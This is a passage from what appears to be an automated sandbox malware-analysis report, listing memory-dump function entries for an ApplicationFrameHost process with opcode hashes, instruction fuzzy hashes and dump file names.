                                                                                                                                  • Opcode Fuzzy Hash: 81dabbfdccdeb0d0615d71020a95fe5350d643cf8b8a95a3a144aa072fe54919
                                                                                                                                  • Instruction Fuzzy Hash: C8F05E3094E6C48FCB46EB3488298947FB0EF56310B8A40EEC049CB0A3D6295849C702
                                                                                                                                  Function 00007FF848F42FB9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: 46bce407a0b3fdd18396b4025fdcd8c80f9fd4183f21767634d85c1bd86ac345
                                                                                                                                  • Instruction ID: 0440477ccf48fdb2bab385765baf5682bc8e17596ece607431f81cdaacc5d392
                                                                                                                                  • Opcode Fuzzy Hash: 46bce407a0b3fdd18396b4025fdcd8c80f9fd4183f21767634d85c1bd86ac345
                                                                                                                                  • Instruction Fuzzy Hash: 70F0307150E7C44FC716AA384869454BF60EF6721174A46EFC045CF1A7DA298889C711
                                                                                                                                  Function 00007FF848F49FF9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: f88edda76269f6554818faa2fb8f88a5db38c1f06384c483522856ea2c014bba
                                                                                                                                  • Instruction ID: 695210813178216ad9ddbe3b268506ebcdd084cf8b0a4d0e91605fbd6936e3e8
                                                                                                                                  • Opcode Fuzzy Hash: f88edda76269f6554818faa2fb8f88a5db38c1f06384c483522856ea2c014bba
                                                                                                                                  • Instruction Fuzzy Hash: F2F0306150E7C44FD71AAB344869455BFA0EE6721174A41EEC045CF1A7EA2DD885C741
                                                                                                                                  Function 00007FF848F40A39 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: d3df900bf469834db7131f74117f7e5ee69fa3ee208dcde6139f46c460ebda39
                                                                                                                                  • Instruction ID: 2d969a235e5e827bb868a2197dcb52c97ffddec005b0b042124e5749af5c8f81
                                                                                                                                  • Opcode Fuzzy Hash: d3df900bf469834db7131f74117f7e5ee69fa3ee208dcde6139f46c460ebda39
                                                                                                                                  • Instruction Fuzzy Hash: 96E06D71A4E7C04FCB56AA348868454BFA0EF6720174A51EEC046CF1A7EA2D9889C701
                                                                                                                                  Function 00007FF848F4A0C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: 8c2a45fa8c0b07bf9567484f28d3693e308dd2dcbb463fd2a89427124fac4835
                                                                                                                                  • Instruction ID: 2c07307fdeb1fc1df21bb46d66a3c5b1d81321d800b675b9c27886d55175f5d9
                                                                                                                                  • Opcode Fuzzy Hash: 8c2a45fa8c0b07bf9567484f28d3693e308dd2dcbb463fd2a89427124fac4835
                                                                                                                                  • Instruction Fuzzy Hash: 17E0396160E7C44FD71AEA388869454BFA1AF6721174A42EFC045CB1A7EA2D9889C701
                                                                                                                                  Function 00007FF848F4A609 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: b6f40702344791e21c89d1696622af287e3fd1ee1109c754dbe73f6a2f319218
                                                                                                                                  • Instruction ID: ec594f5adeac6a6787fba2b7d018808003e6fa25e6d99b26509b2571af69bb1a
                                                                                                                                  • Opcode Fuzzy Hash: b6f40702344791e21c89d1696622af287e3fd1ee1109c754dbe73f6a2f319218
                                                                                                                                  • Instruction Fuzzy Hash: 52E01A7154E7C04FCB56EB7488698547FA0AE6721078A40EFC145CF1F3E62D9849C701
                                                                                                                                  Function 00007FF848F47D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: adfa59eed790b6ad33f118e19aceb52d68f2831de20d1a98cb76669a7a5facce
                                                                                                                                  • Instruction ID: 76ccb1db3841002f090f2275e725b5d31c590bc67cc8447a896bebd41f379629
                                                                                                                                  • Opcode Fuzzy Hash: adfa59eed790b6ad33f118e19aceb52d68f2831de20d1a98cb76669a7a5facce
                                                                                                                                  • Instruction Fuzzy Hash: C5E01A7154E7D44FCB0AEB3488698547FB0AE6721078A44EEC185CF1B3E62D8849C701
                                                                                                                                  Function 00007FF848F41DD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 91f94250f37cd9726d6e4dd98643751f767264de788895bf4974579fdcd2dab1
                                                                                                                                  • Instruction ID: 649911c13a1e62f9963c44fecbbc8df3d2935fd1b46107dd101708c3f69ce2ea
                                                                                                                                  • Opcode Fuzzy Hash: 91f94250f37cd9726d6e4dd98643751f767264de788895bf4974579fdcd2dab1
                                                                                                                                  • Instruction Fuzzy Hash: FEE01A7154F7D44FCB0AEB7488699597FA0AE6721178A40EEC149CF1B3E62E8849C701
                                                                                                                                  Function 00007FF848F215FB Relevance: .8, Instructions: 825COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 39bb00803a3ba864699678a844f10df82c45cbaee1b548b4bb5fc9c414a372a7
                                                                                                                                  • Instruction ID: 9ebf7432ca2a469193f1176ec876577d6f986a94495f2d6f3c41244e4ee21ec8
                                                                                                                                  • Opcode Fuzzy Hash: 39bb00803a3ba864699678a844f10df82c45cbaee1b548b4bb5fc9c414a372a7
                                                                                                                                  • Instruction Fuzzy Hash: 8C428F31E1D95A4FE799FB2894516B5B3A2FF99380F1405B9D40DC32C2DF39AC828B49
                                                                                                                                  Function 00007FF848F108D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 344c04a584a40eb956ba7889fd64ad258fd423650f253d35786bcf8a75869a66
                                                                                                                                  • Instruction ID: 91320432cd4da21af7982135a03715bd4d8110992f656180d4febba3c190f035
                                                                                                                                  • Opcode Fuzzy Hash: 344c04a584a40eb956ba7889fd64ad258fd423650f253d35786bcf8a75869a66
                                                                                                                                  • Instruction Fuzzy Hash: 43414822B1E52A5EE344B76CA0956FA7790EF893A5F0405BBD00DCB1D3DF1CAC8182D8
                                                                                                                                  Function 00007FF848F4C449 Relevance: .1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 50b0a5a14dc3a55733ed15074b516ee8e45f97ca6a655ca74f4cfc932a4dae70
                                                                                                                                  • Instruction ID: f1718d924c9c26a169d3bb3fb06fe6d39e1b6051e830d6e847ca9ca0a877537f
                                                                                                                                  • Opcode Fuzzy Hash: 50b0a5a14dc3a55733ed15074b516ee8e45f97ca6a655ca74f4cfc932a4dae70
                                                                                                                                  • Instruction Fuzzy Hash: 5241532284E7C11FD34387785C264E17FB09E13664B0E82EBD488CF4E3E61C699AC366
                                                                                                                                  Function 00007FF848F42411 Relevance: .1, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dcb9b0a44ac37aea1509aee051a07449da3dcf51d34f921a3757ffbb606edd1b
                                                                                                                                  • Instruction ID: 432115f2d2cef0515033c6e98d3e8fdc1333e807122c0f918060dc55124e33f0
                                                                                                                                  • Opcode Fuzzy Hash: dcb9b0a44ac37aea1509aee051a07449da3dcf51d34f921a3757ffbb606edd1b
                                                                                                                                  • Instruction Fuzzy Hash: 7F310331E0CA694FE755EB58C8546B937A1FBAA710F0402BBD40DE72D2CE386C41C781
                                                                                                                                  Function 00007FF848F10998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 44867ad16f2e00b28b0578eba8371e42f6462af27a496689fb1cb3923e0dc1c9
                                                                                                                                  • Instruction ID: 4d3165ff0a829cfd62003db9fab3bffac3a47e9731ddcc4021ed0e3cf6cf6e69
                                                                                                                                  • Opcode Fuzzy Hash: 44867ad16f2e00b28b0578eba8371e42f6462af27a496689fb1cb3923e0dc1c9
                                                                                                                                  • Instruction Fuzzy Hash: 2621A430B1CA1A1FE788F72C944977A76C2EB997A1F5001B9E40EC32D6DE28AC418285
                                                                                                                                  Function 00007FF848F10C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f5f5f4911d6bf1fef5be61a6e80c1aa87a8c312fb4eb4ffbe3f716d85c6a3aaa
                                                                                                                                  • Instruction ID: 537fd30455cb911963abc8579537191658bf49eca55d56bf5e7b9301eca16810
                                                                                                                                  • Opcode Fuzzy Hash: f5f5f4911d6bf1fef5be61a6e80c1aa87a8c312fb4eb4ffbe3f716d85c6a3aaa
                                                                                                                                  • Instruction Fuzzy Hash: E521F836E0D26A9EE312B76898511EC7B70EFC13A5F1445B3D448CB1C3DB3C694A8B99
                                                                                                                                  Function 00007FF848F152C2 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e7fe9a955ed3b342f3e22afd4fc7485aef3792970903eaff2798a489a075c5e3
                                                                                                                                  • Instruction ID: 9052f67a9270142fee740d986d1ee4cc0218fe22ae49b9c8b02649a922e7afe6
                                                                                                                                  • Opcode Fuzzy Hash: e7fe9a955ed3b342f3e22afd4fc7485aef3792970903eaff2798a489a075c5e3
                                                                                                                                  • Instruction Fuzzy Hash: 11211030D1C92E4EE7A4F71888557F872A1FF98351F5001BAD84EE32D6DF686D818B49
                                                                                                                                  Function 00007FF848F29F2B Relevance: .1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5ee16f9dc7ad06bf9834c502942760603e7441eeed66fabfcf5b820d37d1fe67
                                                                                                                                  • Instruction ID: e8782239f4a338b0fb1ce19e709e88455ca8d81416be1c9fed31349980641b97
                                                                                                                                  • Opcode Fuzzy Hash: 5ee16f9dc7ad06bf9834c502942760603e7441eeed66fabfcf5b820d37d1fe67
                                                                                                                                  • Instruction Fuzzy Hash: 32210C30A186598FDB98EF18C851AA973A2FB58350F1445A9D84EDB2D6CE39EC02CF40
                                                                                                                                  Function 00007FF848F1538E Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 95f23426be26183a9930cdda506bc005cf55d1ded4a29d8883cea958cc96d6b5
                                                                                                                                  • Instruction ID: bec151b813f5d07b2509a22e07559adf2324a6e90149fc1de037c5c538496665
                                                                                                                                  • Opcode Fuzzy Hash: 95f23426be26183a9930cdda506bc005cf55d1ded4a29d8883cea958cc96d6b5
                                                                                                                                  • Instruction Fuzzy Hash: A9114230E1C91A8FEB98FB28C4557B87392FF99340F5000B5D84ED32D6EE68BC418A49
                                                                                                                                  Function 00007FF848F10C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2996046c805899043aac0ac2736b28bae1d5389af0c9782dcab21eae9cb0e925
                                                                                                                                  • Instruction ID: 19496bf566baf2b8446f005b37f2469b5d718eaa3b99edf9c6ef402089094445
                                                                                                                                  • Opcode Fuzzy Hash: 2996046c805899043aac0ac2736b28bae1d5389af0c9782dcab21eae9cb0e925
                                                                                                                                  • Instruction Fuzzy Hash: BD11C235E0D6998FE702FB2898511AC7BB0EFC2390F1444B7D444DB2D2DA385D498B94
                                                                                                                                  Function 00007FF848F4D315 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b7ed8aef2e61d12837291837046dd44a31cefd7d944ab9decfd21ee33aa50804
                                                                                                                                  • Instruction ID: 8a9602fa5ad6a772379da522ea9f7adc86027d1c884d246d941bb1ab98b21f1e
                                                                                                                                  • Opcode Fuzzy Hash: b7ed8aef2e61d12837291837046dd44a31cefd7d944ab9decfd21ee33aa50804
                                                                                                                                  • Instruction Fuzzy Hash: B2017132E0C5099FFB54A75994857FD77E1EBA8BA0F084072C41DE72C5CB3869828B54
                                                                                                                                  Function 00007FF848F10C40 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 212110996dae5ced34412b44eab53468966e709877963ed8f9dbdc79d2ebfb85
                                                                                                                                  • Instruction ID: 18ea889dec4dbde4fae52060380dc1d5dc98366e661c53847566c45326c32549
                                                                                                                                  • Opcode Fuzzy Hash: 212110996dae5ced34412b44eab53468966e709877963ed8f9dbdc79d2ebfb85
                                                                                                                                  • Instruction Fuzzy Hash: E211C035E0D6998FE702FB2888501AC7FB0EF82390F1445F7D844DB2D2DA386D498B84
                                                                                                                                  Function 00007FF848F24581 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 65a4cfaa113a9a89e4489ae6b8aabd50ba2522d4415d83526be2fd53d686546b
                                                                                                                                  • Instruction ID: 8f9fb9d4382590ad95aee31fe13f2f0881ef7bf273991d5beb459967694a6dc1
                                                                                                                                  • Opcode Fuzzy Hash: 65a4cfaa113a9a89e4489ae6b8aabd50ba2522d4415d83526be2fd53d686546b
                                                                                                                                  • Instruction Fuzzy Hash: 69F02831E0C6C54FE311B72884552A83B92EBA6354F0902F7C08DCB1D7DE6D99858389
                                                                                                                                  Function 00007FF848F11AFC Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3c5c06941edb4b99b632e03d4b7439bf07343527d1efc6a744283a1d69e328b2
                                                                                                                                  • Instruction ID: 1f44ffedf3cf4ea706be0a07136611354b8489beb617ec7d553b55faccd15e2a
                                                                                                                                  • Opcode Fuzzy Hash: 3c5c06941edb4b99b632e03d4b7439bf07343527d1efc6a744283a1d69e328b2
                                                                                                                                  • Instruction Fuzzy Hash: 10010030A1C9198FDB58EB04C895FA9B3E5EBA8350F4142A9D40ED72D5DF34AD84CF85
                                                                                                                                  Function 00007FF848F14207 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67d10ba8767907a7be1344e6428fd58f97aa720ac7ad88ee4e688f12a40ea82b
                                                                                                                                  • Instruction ID: 3a581442c95bcc70d3e78557d11f5aa09eb6734313ce9bc9b51ac9dfb184f9ba
                                                                                                                                  • Opcode Fuzzy Hash: 67d10ba8767907a7be1344e6428fd58f97aa720ac7ad88ee4e688f12a40ea82b
                                                                                                                                  • Instruction Fuzzy Hash: DAF03A31E5CA2A9EF698F72880546B92283EBD8790F044575D80DC72C6DE386C828388
                                                                                                                                  Function 00007FF848F10C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5b0b9183de3bd48f5cf998e7f0f7be2de8b686022b40fc3e22b7b8ad88206502
                                                                                                                                  • Instruction ID: 313904d17d0c4cc9288c7a10871e07c44d4fd682a0657d47a7140f9460772790
                                                                                                                                  • Opcode Fuzzy Hash: 5b0b9183de3bd48f5cf998e7f0f7be2de8b686022b40fc3e22b7b8ad88206502
                                                                                                                                  • Instruction Fuzzy Hash: E5017C30D0D2999FE712FB6488541ADBFB0AF82344F1441F6D844DB2D2DA385A448B85
                                                                                                                                  Function 00007FF848F4A579 Relevance: .0, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f0ba2f1e2ddc99e4c0a03086e4b32785464ef44e45c143b39b844a9a592dc13d
                                                                                                                                  • Instruction ID: b053f219e74e97bb6a4b6d9c6a972cdc204a4861019cb82f35e8efd03cb10a40
                                                                                                                                  • Opcode Fuzzy Hash: f0ba2f1e2ddc99e4c0a03086e4b32785464ef44e45c143b39b844a9a592dc13d
                                                                                                                                  • Instruction Fuzzy Hash: 7BF02B2175CBC80FC719563958950617BF1CB6B10134A01EBD096C72A3DD18DC468341
                                                                                                                                  Function 00007FF848F240DA Relevance: .0, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f20000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48477af3a4bc998e5299838d08808570d5a2afdd1a2ed9457ceb293f4c593713
                                                                                                                                  • Instruction ID: 3f510d7a6eba5a5021e3c44f408cc53633957df82bfa86519c8171cafb22ac91
                                                                                                                                  • Opcode Fuzzy Hash: 48477af3a4bc998e5299838d08808570d5a2afdd1a2ed9457ceb293f4c593713
                                                                                                                                  • Instruction Fuzzy Hash: C1F0CD70E0880B8FEB48EB48C8596BE77F1FB50350F10023AC006C32E4CF786A498B80
                                                                                                                                  Function 00007FF848F4ACFD Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f40000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b68ba4989268c9ef05047155b9365ea2e487a79d138f0b5882dd75668b2ca11a
                                                                                                                                  • Instruction ID: 47006695116ca616228e8974d06eba8ef817809bed144994cb181229ee925c89
                                                                                                                                  • Opcode Fuzzy Hash: b68ba4989268c9ef05047155b9365ea2e487a79d138f0b5882dd75668b2ca11a
                                                                                                                                  • Instruction Fuzzy Hash: C7F05E31E5DD1A9FF289F728849A3B9A2E1FBACB41F54057AD00DD32D2CF2C68858745
                                                                                                                                  Function 00007FF848F1541D Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000037.00000002.2862284207.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_55_2_7ff848f10000_ApplicationFrameHost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
